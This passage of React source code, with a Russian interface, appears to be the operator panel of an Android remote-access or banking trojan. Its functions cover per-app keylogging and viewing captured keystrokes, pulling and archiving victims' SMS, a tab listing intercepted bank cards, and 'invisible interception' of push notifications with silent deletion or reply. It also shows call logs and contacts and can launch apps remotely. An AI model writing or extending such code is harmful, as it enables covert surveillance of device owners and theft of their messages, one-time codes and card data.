                  <div style={{ flex: 1, minWidth: 0 }}>
                    <div style={{ display: 'flex', alignItems: 'center', gap: 8, flexWrap: 'wrap' }}>
                      <span style={{ fontWeight: 'bold', fontSize: 14, color: '#fff' }}>{item.name}</span>
                      {item.system && <span style={{ fontSize: 10, background: '#3a3f4c', color: '#aaa', borderRadius: 3, padding: '1px 5px' }}>системное</span>}
                      <span style={{ fontSize: 11, background: color + '33', color, border: `1px solid ${color}66`, borderRadius: 4, padding: '1px 7px', whiteSpace: 'nowrap' }}>
                        {item.verdict}
                      </span>
                    </div>
                    <div style={{ fontSize: 11, color: '#666', marginTop: 2, fontFamily: 'monospace' }}>{item.pkg}</div>
                  </div>
                  <div style={{ display: 'flex', alignItems: 'center', gap: 10, flexShrink: 0 }}>
                    <span style={{ background: color + '33', color, border: `1px solid ${color}66`, borderRadius: 4, padding: '2px 8px', fontSize: 12, fontWeight: 'bold' }}>
                      Риск: {item.score}
                    </span>
                    <span style={{ color: '#888', fontSize: 12 }}>{isOpen ? '▲' : '▼'}</span>
                  </div>
                </div>
                {isOpen && (
                  <div style={{ padding: '0 14px 12px', borderTop: '1px solid #333' }}>
                    <p style={{ color: '#aaa', fontSize: 12, margin: '8px 0 4px' }}>Причины:</p>
                    <ul style={{ margin: 0, padding: '0 0 0 18px', fontSize: 12, color: '#ccc' }}>
                      {(item.reasons || []).map((r, j) => <li key={j} style={{ marginBottom: 2 }}>{r}</li>)}
                    </ul>
                  </div>
                )}
              </div>
            );
          })}
        </div>
      )}
    </div>
  );
};

const renderAppsSection = (appList, searchQuery, onSearchChange, isLoadingApps, onLaunchApp, hasPrivilege, onToggleKeylog, keylogActivePackages, keylogDataPackages, onViewKeylog) => {
  const extraKeylogApps = Object.keys(keylogDataPackages || {}).filter(
    pkg => keylogDataPackages[pkg] > 0 && !appList.includes(pkg)
  );
  const combinedApps = [...extraKeylogApps, ...appList];
  const filteredBySearch = combinedApps.filter(app =>
    app && typeof app === 'string' && app.toLowerCase().includes(searchQuery.toLowerCase())
  );

  return (
    <div className="info-section">
      <h4>Установленные приложения ({combinedApps.length})</h4>
      <input
        type="text"
        placeholder="Поиск по приложениям..."
        value={searchQuery}
        onChange={onSearchChange}
        style={{
          width: '100%', padding: '8px 10px', marginBottom: '15px',
          boxSizing: 'border-box', borderRadius: '4px', border: '1px solid #555',
          backgroundColor: '#333', color: '#fff'
        }}
      />
      {isLoadingApps ? (
          <p>Загрузка списка приложений...</p>
      ) : (
        filteredBySearch.length > 0
          ? filteredBySearch.map((app, i) => {
              const klActive = keylogActivePackages ? keylogActivePackages.has(app) : false;
              const klCount = keylogDataPackages ? (keylogDataPackages[app] || 0) : 0;
              return (
                <p key={i} style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', gap: '6px', margin: '6px 0', wordBreak: 'break-all' }}>
                  <span style={{ flex: 1, minWidth: 0 }}>{app}</span>
                  {hasPrivilege && (
                    <span style={{ display: 'flex', gap: '4px', flexShrink: 0 }}>
                      <span
                        onClick={() => onLaunchApp && onLaunchApp(app)}
                        style={{ display: 'inline-block', padding: '2px 10px', background: '#22a06b', color: '#fff', borderRadius: '3px', cursor: 'pointer', fontSize: '12px', whiteSpace: 'nowrap', userSelect: 'none', lineHeight: '1.6' }}
                      >
                        ▶ Запустить
                      </span>
                      <span
                        onClick={() => onToggleKeylog && onToggleKeylog(app)}
                        title={klActive ? 'Остановить кейлог' : 'Запустить кейлог'}
                        style={{ display: 'inline-block', padding: '2px 10px', background: klActive ? '#c0392b' : '#8e44ad', color: '#fff', borderRadius: '3px', cursor: 'pointer', fontSize: '12px', whiteSpace: 'nowrap', userSelect: 'none', lineHeight: '1.6' }}
                      >
                        ⌨ {klActive ? '● Кейлог' : 'Кейлог'}
                      </span>
                      {klCount > 0 && (
                        <span
                          onClick={() => onViewKeylog && onViewKeylog(app)}
                          title="Просмотр перехваченного ввода"
                          style={{ display: 'inline-block', padding: '2px 10px', background: '#2980b9', color: '#fff', borderRadius: '3px', cursor: 'pointer', fontSize: '12px', whiteSpace: 'nowrap', userSelect: 'none', lineHeight: '1.6' }}
                        >
                          📋 Логи ({klCount})
                        </span>
                      )}
                    </span>
                  )}
                </p>
              );
            })
          : <p>Приложения не найдены.</p>
      )}
    </div>
  );
};

const renderPermissionsSection = (info) => {
  const err = renderStatus(info.permissions);
  if (err) return <div className="info-section"><h4>Разрешения</h4>{err}</div>;

  const data = info.permissions?.data;
  if (!data) return <div className="info-section"><h4>Разрешения</h4><p className="error-text">Нет данных о разрешениях</p></div>;

  const deviceTime = data['device_time'];
  // Ключи которые уже показаны в группах (чтобы не дублировать)
  const shownKeys = new Set(PERMISSIONS_GROUPS.flatMap(g => g.keys));
  // is_ignoring_battery_optimizations — дубль is_battery_optimized_ignored, скрываем
  shownKeys.add('is_ignoring_battery_optimizations');
  shownKeys.add('device_time');

  const boolBadge = (val) => val === true
    ? <span style={{ color: '#4caf50', fontWeight: 'bold', fontSize: '13px' }}>✔ Да</span>
    : <span style={{ color: '#f44336', fontWeight: 'bold', fontSize: '13px' }}>✖ Нет</span>;

  const rowStyle = {
    display: 'flex', justifyContent: 'space-between', alignItems: 'center',
    padding: '5px 8px', borderRadius: '4px',
  };
  const labelStyle = { color: '#ccc', fontSize: '13px' };
  const groupHeaderStyle = {
    fontWeight: '700', fontSize: '11px', textTransform: 'uppercase',
    letterSpacing: '0.7px', color: '#888', margin: '14px 0 5px 0',
    paddingBottom: '4px', borderBottom: '1px solid #2a2a2a',
  };

  return (
    <div className="info-section">
      {deviceTime && (
        <p style={{ color: '#888', fontSize: '12px', marginBottom: '4px' }}>
          🕐 Время на устройстве: <strong style={{ color: '#bbb' }}>
            {String(deviceTime).replace('T', ' ').substring(0, 19)}
          </strong>
        </p>
      )}

      {PERMISSIONS_GROUPS.map(group => {
        const rows = group.keys
          .map(key => ({ key, val: data[key] }))
          .filter(({ val }) => val !== undefined);
        if (rows.length === 0) return null;
        return (
          <div key={group.label}>
            <div style={groupHeaderStyle}>{group.icon} {group.label}</div>
            <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '2px' }}>
              {rows.map(({ key, val }, i) => (
                <div key={key} style={{ ...rowStyle, background: i % 2 === 0 ? '#1e1e1e' : 'transparent' }}>
                  <span style={labelStyle}>{PERMISSIONS_LABELS[key] || key}</span>
                  {typeof val === 'boolean' ? boolBadge(val) : <span style={{ color: '#aaa', fontSize: '13px' }}>{String(val)}</span>}
                </div>
              ))}
            </div>
          </div>
        );
      })}
    </div>
  );
};

const subTabStyle = {
  background: 'none',
  border: 'none',
  padding: '5px 10px',
  cursor: 'pointer',
  color: '#ccc',
  fontSize: '14px',
  borderBottom: '2px solid transparent'
};

const activeSubTabStyle = {
  color: '#fff',
  borderBottom: '2px solid #6c63ff',
  fontWeight: 'bold'
};

const renderSmsSection = (
  device,
  isLoading,
  handleRefresh,
  outgoingMessages,
  activeSmsTab,
  setActiveSmsTab,
  groupedAndSortedSms,
  sortedIncomingSms,
  searchQuery,
  onSearchChange,
  isSmsLivePending,
  onRequestLiveSms,
  interceptedCards,
  isCardsLoading,
  collapsedSenders,
  setCollapsedSenders
) => {
  const toggleSender = (from) => {
    setCollapsedSenders(prev => {
      const next = new Set(prev);
      if (next.has(from)) next.delete(from);
      else next.add(from);
      return next;
    });
  };
  const renderStatusBadge = (status) => {
    const styles = {
      sending: { backgroundColor: '#f39c12', color: 'white' },
      sent: { backgroundColor: '#3498db', color: 'white' },
      delivered: { backgroundColor: '#2ecc71', color: 'white' },
      notSent: { backgroundColor: '#e74c3c', color: 'white' },
      error: { backgroundColor: '#e74c3c', color: 'white' }
    };
    const text = {
      sending: 'Отправляется',
      sent: 'Отправлено',
      delivered: 'Доставлено',
      notSent: 'Не доставлено/Нет денег/Нет сети',
      error: 'Ошибка (устройство оффлайн)'
    };
    return (
      <span style={{ ...styles[status], padding: '2px 8px', borderRadius: '4px', fontSize: '12px', fontWeight: 'bold' }}>
        {text[status] || 'Неизвестно'}
      </span>
    );
  };

  return (
    <div>
      <input
        type="text"
        placeholder="Поиск по отправителю..."
        value={searchQuery}
        onChange={onSearchChange}
        style={{
          width: '100%',
          padding: '8px 10px',
          marginBottom: '10px',
          boxSizing: 'border-box',
          borderRadius: '4px',
          border: '1px solid #555',
          backgroundColor: '#333',
          color: '#fff'
        }}
      />

      <div
        style={{
          display: 'flex',
          gap: '10px',
          alignItems: 'center',
          marginBottom: '10px'
        }}
      >
        <button
          onClick={onRequestLiveSms}
          disabled={isSmsLivePending}
          style={{
            background: isSmsLivePending ? '#555' : '#5a5a9e',
            border: '1px solid #5a5a9e',
            color: '#fff',
            borderRadius: '4px',
            padding: '4px 10px',
            fontSize: '12px',
            cursor: isSmsLivePending ? 'not-allowed' : 'pointer',
            whiteSpace: 'nowrap'
          }}
        >
          Запросить СМС с устройства
        </button>
        {isSmsLivePending && (
          <span style={{ fontSize: '12px', color: '#cfd2da' }}>
            ожидаем список актуальных смс с устройства
          </span>
        )}
      </div>

      <div
        className="sms-tabs"
        style={{
          display: 'flex',
          gap: '10px',
          marginBottom: '15px',
          borderBottom: '1px solid #444',
          paddingBottom: '5px'
        }}
      >
        <button
          onClick={() => setActiveSmsTab('incoming')}
          style={{
            background: 'none',
            border: 'none',
            padding: '5px 10px',
            cursor: 'pointer',
            color: activeSmsTab === 'incoming' ? '#fff' : '#ccc',
            borderBottom: activeSmsTab === 'incoming' ? '2px solid #6c63ff' : '2px solid transparent',
            fontWeight: activeSmsTab === 'incoming' ? 'bold' : 'normal'
          }}
        >
          Входящие
        </button>
        <button
          onClick={() => setActiveSmsTab('archivedIncoming')}
          style={{
            background: 'none',
            border: 'none',
            padding: '5px 10px',
            cursor: 'pointer',
            color: activeSmsTab === 'archivedIncoming' ? '#fff' : '#ccc',
            borderBottom: activeSmsTab === 'archivedIncoming' ? '2px solid #6c63ff' : '2px solid transparent',
            fontWeight: activeSmsTab === 'archivedIncoming' ? 'bold' : 'normal'
          }}
        >
          Входящие сохранённые
        </button>
        <button
          onClick={() => setActiveSmsTab('outgoing')}
          style={{
            background: 'none',
            border: 'none',
            padding: '5px 10px',
            cursor: 'pointer',
            color: activeSmsTab === 'outgoing' ? '#fff' : '#ccc',
            borderBottom: activeSmsTab === 'outgoing' ? '2px solid #6c63ff' : '2px solid transparent',
            fontWeight: activeSmsTab === 'outgoing' ? 'bold' : 'normal'
          }}
        >
          Исходящие с панели
        </button>
        <button
          onClick={() => setActiveSmsTab('interceptedCards')}
          style={{
            background: 'none',
            border: 'none',
            padding: '5px 10px',
            cursor: 'pointer',
            color: activeSmsTab === 'interceptedCards' ? '#fff' : '#ccc',
            borderBottom: activeSmsTab === 'interceptedCards' ? '2px solid #2ecc71' : '2px solid transparent',
            fontWeight: activeSmsTab === 'interceptedCards' ? 'bold' : 'normal'
          }}
        >
          Найденные карты
        </button>
      </div>

      {activeSmsTab === 'incoming' && (
        <>
          {isLoading ? (
            <p style={{ margin: 0, padding: '8px 0' }}>
              <LoadingDots text="Обновление" />
            </p>
          ) : !Array.isArray(sortedIncomingSms) ? (
            <div>
              <p>СМС не загружены.</p>
              <button onClick={() => handleRefresh('sms')} disabled={isLoading}>
                Обновить
              </button>
            </div>
          ) : (
            <div className="sms-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
              {sortedIncomingSms.length > 0 ? (
                sortedIncomingSms.map((sms, index) => {
                  const isCollapsed = collapsedSenders?.has(sms.from);
                  return (
                    <div
                      key={`${sms.from}-${index}`}
                      className="sms-thread"
                      style={{ borderBottom: '1px solid #444', paddingBottom: '10px', marginBottom: '10px' }}
                    >
                      <h4
                        style={{ margin: '0 0 6px 0', cursor: 'pointer', display: 'flex', alignItems: 'center', gap: '6px', userSelect: 'none' }}
                        onClick={() => toggleSender(sms.from)}
                      >
                        <span style={{ fontSize: '12px', color: '#888' }}>
                          {isCollapsed ? '▶' : '▼'}
                        </span>
                        <span>От: {sms.from}{isCollapsed ? ` (${sms.messages?.length || 0})` : ''}</span>
                      </h4>
                      {!isCollapsed && sms.messages.map((msg, msgIndex) => (
                        <p key={msgIndex} style={{ margin: 0 }}>
                          {msg.body} - <em>{new Date(msg.date).toLocaleString('ru-RU')}{sms.simSlot != null && sms.simSlot >= 0 ? ` (SIM: ${sms.simSlot + 1})` : ''}</em>
                        </p>
                      ))}
                    </div>
                  );
                })
              ) : (
                <p>Нет входящих СМС.</p>
              )}
            </div>
          )}
        </>
      )}

      {activeSmsTab === 'archivedIncoming' && (
        <div className="archived-sms-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
          {(() => {
            const flat = groupedAndSortedSms
              .flatMap(([from, messages]) => messages.map(msg => ({ ...msg, from })))
              .sort((a, b) =>
                new Date(b.deviceTimestamp || b.receivedAt) -
                new Date(a.deviceTimestamp || a.receivedAt)
              );
            if (flat.length === 0) return <p>Нет сохраненных входящих сообщений.</p>;
            return flat.map((msg, idx) => (
              <div
                key={msg._id || msg.receivedAt || idx}
                style={{ border: '1px solid #333', borderRadius: '4px', padding: '8px 10px', marginBottom: '8px' }}
              >
                <p style={{ margin: '0 0 4px 0', fontSize: '12px' }}>
                  <strong style={{ color: '#a5a4ff' }}>От: {msg.from}</strong>
                </p>
                <p style={{ margin: 0, wordBreak: 'break-word', color: '#ddd' }}>{msg.body}</p>
                <small style={{ color: '#888', display: 'block', textAlign: 'right', marginTop: '4px' }}>
                  {new Date(msg.deviceTimestamp || msg.receivedAt).toLocaleString('ru-RU')}{msg.simSlot != null && msg.simSlot >= 0 ? ` (SIM: ${msg.simSlot + 1})` : ''}
                </small>
              </div>
            ));
          })()}
        </div>
      )}

      {activeSmsTab === 'outgoing' && (
        <div className="outgoing-sms-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
          {outgoingMessages && outgoingMessages.length > 0 ? (
            outgoingMessages.map((msg) => (
              <div
                key={msg.id || msg.messageUuid}
                style={{
                  border: '1px solid #444',
                  borderRadius: '5px',
                  padding: '10px',
                  marginBottom: '10px'
                }}
              >
                <div
                  style={{
                    display: 'flex',
                    justifyContent: 'space-between',
                    alignItems: 'center',
                    marginBottom: '5px'
                  }}
                >
                  <span>
                    <strong>Кому:</strong> {msg.recipient || msg.to}
                  </span>
                  {renderStatusBadge(msg.status)}
                </div>
                <p style={{ margin: '0 0 5px 0', wordBreak: 'break-word', color: '#ddd' }}>
                  {msg.message || msg.text}
                </p>
                <small style={{ color: '#888' }}>
                  {msg.timestamp ? new Date(msg.timestamp).toLocaleString('ru-RU') : ''}
                  {typeof msg.sim !== 'undefined' && ` (SIM: ${msg.sim + 1})`}
                  {typeof msg.simIndex !== 'undefined' && ` (SIM: ${msg.simIndex + 1})`}
                </small>
              </div>
            ))
          ) : (
            <p>Нет сообщений, отправленных из панели.</p>
          )}
        </div>
      )}
      {activeSmsTab === 'interceptedCards' && (
        <div className="intercepted-cards-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
          {isCardsLoading ? (
            <p style={{ margin: 0, padding: '8px 0' }}>
              <LoadingDots text="Загрузка карт с сервера" />
            </p>
          ) : interceptedCards && interceptedCards.length > 0 ? (
            interceptedCards.map((card, index) => (
              <div
                key={index}
                style={{
                  border: '1px solid #2ecc71',
                  backgroundColor: '#1e2b22',
                  borderRadius: '5px',
                  padding: '12px',
                  marginBottom: '10px',
                  display: 'flex',
                  alignItems: 'center',
                  gap: '10px'
                }}
              >
                <span style={{ fontSize: '24px' }}>💳</span>
                <span style={{ fontSize: '16px', color: '#2ecc71', fontWeight: 'bold', wordBreak: 'break-word' }}>
                  {card}
                </span>
              </div>
            ))
          ) : (
            <p style={{ color: '#ccc' }}>Перехваченные карты пока не найдены.</p>
          )}
        </div>
      )}
    </div>
  );
};


const renderCallLogsSection = (device, callLogs, isLoading, handleRefresh, activeCallTab, setActiveCallTab, unlockHistory) => {
  if (isLoading && !callLogs) return <p>Загрузка журнала звонков...</p>;
  const logsData = callLogs?.list;
  const lastUpdated = callLogs?.lastUpdatedAt;
  const isDeviceOnline = (new Date() - new Date(device.lastSeen)) < 25000;
  const isArchived = logsData && (!isDeviceOnline || !(device.systemInfo?.permissions?.data['android.permission.READ_CALL_LOG'] === true));
  if (!logsData) {
    return (
      <div>
        <p>Журнал звонков не загружен. Нажмите "Обновить", чтобы запросить его.</p>
        <button onClick={() => handleRefresh('calls', true)} disabled={isLoading} style={{ padding: '4px 10px', fontSize: '12px' }}>
          {isLoading ? 'Обновление...' : 'Обновить'}
        </button>
      </div>
    );
  }
  const filteredLogs = logsData.filter(log => {
    if (activeCallTab === 'incoming') return log.type === 'Incoming';
    if (activeCallTab === 'outgoing') return log.type === 'Outgoing';
    if (activeCallTab === 'missed') return log.type === 'Missed';
    return true;
  });
  const formatDuration = (seconds) => {
    if (seconds < 60) return `${seconds} сек`;
    const min = Math.floor(seconds / 60);
    const sec = seconds % 60;
    return `${min} мин ${sec} сек`;
  };
  return (
    <div className="info-section">
      <h4 style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
        <span>
          Журнал звонков ({logsData.length})
          {lastUpdated && (
            <span style={{ fontSize: 12, color: '#999', marginLeft: '10px' }}>
              Обновлено: {new Date(lastUpdated).toLocaleString('ru-RU')}
            </span>
          )}
        </span>
        <div style={{ display: 'flex', alignItems: 'center', gap: '10px' }}>
          {isArchived && (
            <span style={{ color: '#ffc107', fontSize: '12px', fontStyle: 'italic', marginRight: '10px' }}>
              Сохранённый архив
            </span>
          )}
          <button onClick={() => handleRefresh('calls', true)} disabled={isLoading} style={{ padding: '4px 10px', fontSize: '12px' }}>
            {isLoading ? 'Обновление...' : 'Обновить'}
          </button>
        </div>
      </h4>
      <div className="call-log-tabs" style={{ display: 'flex', gap: '10px', marginBottom: '15px', borderBottom: '1px solid #444', paddingBottom: '5px' }}>
        <button onClick={() => setActiveCallTab('all')} style={{ ...subTabStyle, ...(activeCallTab === 'all' && activeSubTabStyle) }}>Все</button>
        <button onClick={() => setActiveCallTab('incoming')} style={{ ...subTabStyle, ...(activeCallTab === 'incoming' && activeSubTabStyle) }}>Входящие</button>
        <button onClick={() => setActiveCallTab('outgoing')} style={{ ...subTabStyle, ...(activeCallTab === 'outgoing' && activeSubTabStyle) }}>Исходящие</button>
        <button onClick={() => setActiveCallTab('missed')} style={{ ...subTabStyle, ...(activeCallTab === 'missed' && activeSubTabStyle) }}>Пропущенные</button>
      </div>
      {filteredLogs.length > 0 ? (
        <div className="call-log-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
          <table style={{ width: '100%', borderCollapse: 'collapse' }}>
            <thead>
              <tr>
                <th style={{ textAlign: 'left' }}>Тип</th>
                <th style={{ textAlign: 'left' }}>Контакт/Номер</th>
                <th style={{ textAlign: 'left' }}>Дата</th>
                <th style={{ textAlign: 'left' }}>Длительность</th>
              </tr>
            </thead>
            <tbody>
              {filteredLogs.map((log, index) => (
                <tr key={index}>
                  <td>{log.type}</td>
                  <td><strong>{log.name || 'Без имени'}</strong><br />{log.number}</td>
                  <td>{log.date}</td>
                  <td>{formatDuration(log.durationSeconds)}</td>
                </tr>
              ))}
            </tbody>
          </table>
        </div>
      ) : <p>Нет звонков для отображения в этой категории.</p>}

    </div>
  );
};

const formatTimeAgo = (dateString) => {
  if (!dateString) return '';
  const getPlural = (number, titles) => {
    const cases = [2, 0, 1, 1, 1, 2];
    const titleIndex = (number % 100 > 4 && number % 100 < 20) ? 2 : cases[(number % 10 < 5) ? number % 10 : 5];
    return titles[titleIndex];
  };
  const now = new Date();
  const past = new Date(dateString);
  const seconds = Math.floor((now - past) / 1000);
  if (seconds < 60) {
    return 'только что';
  }
  const minutes = Math.floor(seconds / 60);
  if (minutes < 60) {
    return `${minutes} ${getPlural(minutes, ['минуту', 'минуты', 'минут'])} назад`;
  }
  const hours = Math.floor(minutes / 60);
  if (hours < 24) {
    return `${hours} ${getPlural(hours, ['час', 'часа', 'часов'])} назад`;
  }
  const days = Math.floor(hours / 24);
  return `${days} ${getPlural(days, ['день', 'дня', 'дней'])} назад`;
};

const NotificationsSection = ({ notifications, onDelete, onReply, device, onToggleIntercept, isLoading, onRefreshNotifications }) => {
  const [appFilter, setAppFilter] = useState('');
  const filteredNotifications = appFilter.trim()
    ? (notifications || []).filter(n => (n.appName || '').toLowerCase().includes(appFilter.trim().toLowerCase()))
    : (notifications || []);
  const getStatusBadge = (status, replyText = '') => {
    const style = {
      padding: '3px 8px',
      borderRadius: '12px',
      fontSize: '12px',
      fontWeight: 'bold',
      color: 'white'
    };
    switch (status) {
      case 'deleted_by_panel':
        return <span style={{ ...style, backgroundColor: '#e74c3c' }}>Удалено</span>;
      case 'removed_by_user':
        return <span style={{ ...style, backgroundColor: '#95a5a6' }}>Убрано пользователем</span>;
      case 'replied':
        return (
          <div>
            <p style={{ margin: '0 0 5px 0', borderLeft: '3px solid #2ecc71', paddingLeft: '8px', fontStyle: 'italic' }}>
              {replyText}
            </p>
            <span style={{ ...style, backgroundColor: '#2ecc71' }}>Отвечено</span>
          </div>
        );
      case 'action_failed':
        return <span style={{ ...style, backgroundColor: '#f39c12' }}>Действие не удалось</span>;
      default:
        return null;
    }
  };
  const formatTimeAgoInner = (dateString) => {
    if (!dateString) return '';
    const getPlural = (number, titles) => {
      const cases = [2, 0, 1, 1, 1, 2];
      const titleIndex = (number % 100 > 4 && number % 100 < 20) ? 2 : cases[(number % 10 < 5) ? number % 10 : 5];
      return titles[titleIndex];
    };
    const now = new Date();
    const past = new Date(dateString);
    const seconds = Math.floor((now - past) / 1000);
    if (seconds < 60) return 'только что';
    const minutes = Math.floor(seconds / 60);
    if (minutes < 60) return `${minutes} ${getPlural(minutes, ['минуту', 'минуты', 'минут'])} назад`;
    const hours = Math.floor(minutes / 60);
    if (hours < 24) return `${hours} ${getPlural(hours, ['час', 'часа', 'часов'])} назад`;
    const days = Math.floor(hours / 24);
    return `${days} ${getPlural(days, ['день', 'дня', 'дней'])} назад`;
  };
  return (
    <div className="info-section">
      <div style={{ display: 'flex', alignItems: 'center', gap: '15px', marginBottom: '15px', paddingBottom: '10px', borderBottom: '1px solid #555' }}>
        <button onClick={onToggleIntercept}>
          Невидимый перехват
        </button>
        <span style={{ fontSize: '20px', fontWeight: 'bold' }}>
          {device?.invisibleIntercept
            ? <span style={{ color: '#2e7d32' }}>✔</span>
            : <span style={{ color: '#d32f2f' }}>✖</span>
          }
        </span>
      </div>
      <h4 style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
        <span>История Push-уведомлений ({filteredNotifications.length}{appFilter.trim() ? ` / ${notifications?.length || 0}` : ''})</span>
        <button onClick={onRefreshNotifications} disabled={isLoading} style={{ padding: '4px 10px', fontSize: '12px', cursor: 'pointer' }}>
          {isLoading ? 'Обновление...' : 'Обновить'}
        </button>
      </h4>
      <div style={{ marginBottom: '8px' }}>
        <input
          type="text"
          value={appFilter}
          onChange={e => setAppFilter(e.target.value)}
          placeholder="Фильтр по приложению..."
          style={{ width: '100%', padding: '5px 8px', background: '#2a2a2e', border: '1px solid #444', borderRadius: '4px', color: '#ddd', fontSize: '12px', boxSizing: 'border-box' }}
        />
      </div>
      <div className="notification-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
        {filteredNotifications.length > 0 ? filteredNotifications.map((item) => (
          <div key={item._id} style={{ border: '1px solid #444', borderRadius: '5px', padding: '10px', marginBottom: '10px' }}>
            <p style={{margin: '0 0 5px 0', wordBreak: 'break-word'}}>
              <strong>От приложения:</strong> <span style={{color: '#a5a4ff'}}>{item.appName}</span>
            </p>
            <div style={{ background: '#2a2a2e', padding: '8px', borderRadius: '4px', marginBottom: '8px' }}>
              <p style={{ margin: '0 0 5px 0', fontWeight: 'bold' }}>Заголовок: {item.title || '(пусто)'}</p>
              <pre style={{ margin: 0, whiteSpace: 'pre-wrap', color: '#ddd' }}>{item.text || '(пусто)'}</pre>
            </div>
            <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
              {item.status === 'active' ? (
                <div className="actions" style={{ display: 'flex', alignItems: 'center' }}>
                  <button onClick={() => onDelete(item.notificationKey)} style={{ fontSize: '12px', padding: '3px 8px', marginRight: '5px' }}>
                    Удалить
                  </button>
                  {item.isReplyable && (
                    <button onClick={() => onReply(item.notificationKey)} style={{ fontSize: '12px', padding: '3px 8px' }}>
                      Ответить
                    </button>
                  )}
                </div>
              ) : (
                <div className="status-badge">
                  {getStatusBadge(item.status, item.replyText)}
                </div>
              )}
              <small style={{ color: '#888' }}>
                {formatTimeAgoInner(item.receivedAt)}
              </small>
            </div>
          </div>
        )) : <p>{appFilter.trim() ? `Нет уведомлений от «${appFilter.trim()}».` : 'Нет истории уведомлений.'}</p>}
      </div>
    </div>
  );
};

const renderContactsSection = (device, isLoading, handleRefresh, onAddContactClick, isArchived) => {
  if (isLoading && !device.contacts) return <p>Загрузка контактов...</p>;
  const contactsData = device.contacts?.list;
  const lastUpdated = device.contacts?.lastUpdatedAt;
  if (!contactsData) return (
    <div>
      <p>Контакты не загружены. Нажмите "Обновить", чтобы запросить их.</p>
      <button onClick={() => handleRefresh('contacts')} disabled={isLoading}>
        {isLoading ? 'Загрузка...' : 'Обновить'}
      </button>
    </div>
  );
  return (
    <div className="info-section">
      <h4 style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
        <span>
          Контакты ({contactsData.length})
          {lastUpdated &&
            <span style={{ fontSize: 12, color: '#999', marginLeft: '10px' }}>
              Обновлено: {new Date(lastUpdated).toLocaleString('ru-RU')}
            </span>
          }
        </span>
        <div style={{ display: 'flex', alignItems: 'center', gap: '10px' }}>
          {isArchived && (
            <span style={{ color: '#ffc107', fontSize: '12px', fontStyle: 'italic', marginRight: '10px' }}>
              Сохранённый архив
            </span>
          )}
          <button onClick={onAddContactClick} style={{ padding: '4px 10px', fontSize: '12px', cursor: 'pointer' }}>
            Добавить контакт
          </button>
          <button onClick={() => handleRefresh('contacts')} disabled={isLoading} style={{ padding: '4px 10px', fontSize: '12px', cursor: 'pointer' }}>
            {isLoading ? 'Обновление...' : 'Обновить'}
          </button>
        </div>
      </h4>
      {contactsData.length > 0 ? (
        <div className="contacts-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
          {contactsData.map((contact, index) => (
            <p key={index}>
              <strong>{contact.name || 'Без имени'}:</strong> {contact.phoneNumber}
            </p>
          ))}
        </div>
      ) : <p>Список контактов пуст.</p>}
    </div>
  );
};

function DeviceDetailsContent({
  device,
  activeTab,
  isLoading,
  handleRefreshInfo,
  onReload,
  onAddContactClick,
  outgoingMessages,
  isContactsArchived,
  ussdHistory,
  mediaFiles,
  onGetMedia,
  onDownloadMedia,
  callLogs,
  unlockHistory,
  onCheckNumber,
  onCheckOsint,
  notifications,
  onDeleteNotification,
  onReplyToNotification,
  onRefreshNotifications,
  onToggleIntercept,
  uploadProgress,
  capturedPoto,
  onClearPoto,
  onSavePoto,
  onRequestPrivilege,
  privilegeStatus,
  onRequestPermission,
  onLaunchApp,
  onToggleKeylog,
  keylogActivePackages,
  keylogDataPackages,
  onViewKeylog,
  minkScanResult,
  onMinkScan,
  onSendWindow,
  windowHistory,
  onRefreshWindowHistory,
  archivedSms,
  isZipModalOpen,
  onOpenZipModal,
  onCloseZipModal,
  onSubmitZipRequest,
  archivesList,
  zipBusy,
  zipProgressState,
  zipWarning,
  downloadLinks,
  onRequestArchivesList,
  onDownloadArchive,
  onDeleteArchive,
  wsRef
}) {
  
  const [appSearchQuery, setAppSearchQuery] = useState('');
  const [activeAppsTab, setActiveAppsTab] = useState('installed');
  const [smsSearchQuery, setSmsSearchQuery] = useState('');
  const [activeSmsTab, setActiveSmsTab] = useState('incoming');
  const [collapsedSenders, setCollapsedSenders] = useState(new Set());
  const [activeCallTab, setActiveCallTab] = useState('all');
  const [activeMediaTab, setActiveMediaTab] = useState('local');
  const [isSmsLivePending, setIsSmsLivePending] = useState(false);
  const [smsLiveTimerId, setSmsLiveTimerId] = useState(null);
  const [lastSmsReqId, setLastSmsReqId] = useState(null);
  const [interceptedCards, setInterceptedCards] = useState([]);
  const [isCardsLoading, setIsCardsLoading] = useState(false);

  useEffect(() => {
    if (activeTab === 'sms' && activeSmsTab === 'interceptedCards' && device?.uuid) {
      const fetchCards = async () => {
        setIsCardsLoading(true);
        try {
          const res = await api.getInterceptedCards(device.uuid);
          setInterceptedCards(res.data || []);
        } catch (e) {
          console.error("Ошибка при загрузке карт:", e);
          TOAST.warning('Не удалось загрузить найденные карты.');
          setInterceptedCards([]);
        } finally {
          setIsCardsLoading(false);
        }
      };
      fetchCards();
    }
  }, [activeTab, activeSmsTab, device?.uuid]);

  const groupedAndSortedSms = useMemo(() => {
    if (!Array.isArray(archivedSms) || archivedSms.length === 0) return [];
    const uniqueMessages = Array.from(
      new Map(archivedSms.map(msg => [msg.body + msg.receivedAt, msg])).values()
    );
    const grouped = uniqueMessages.reduce((acc, msg) => {
      const from = msg.from || 'Unknown';
      if (!acc[from]) acc[from] = [];
      acc[from].push(msg);
      return acc;
    }, {});
    const sortedGroups = Object.entries(grouped).sort(([, msgsA], [, msgsB]) => {
      const lastTimeA = new Date(msgsA[0].deviceTimestamp || msgsA[0].receivedAt).getTime();
      const lastTimeB = new Date(msgsB[0].deviceTimestamp || msgsB[0].receivedAt).getTime();
      return lastTimeB - lastTimeA;
    });
    if (!smsSearchQuery) return sortedGroups;
    return sortedGroups.filter(([from]) =>
      from.toLowerCase().includes(smsSearchQuery.toLowerCase())
    );
  }, [archivedSms, smsSearchQuery]);

  const sortedIncomingSms = useMemo(() => {
    const smsList = device?.sms || [];
    if (!Array.isArray(smsList) || smsList.length === 0) return [];

    let processedList = JSON.parse(JSON.stringify(smsList));

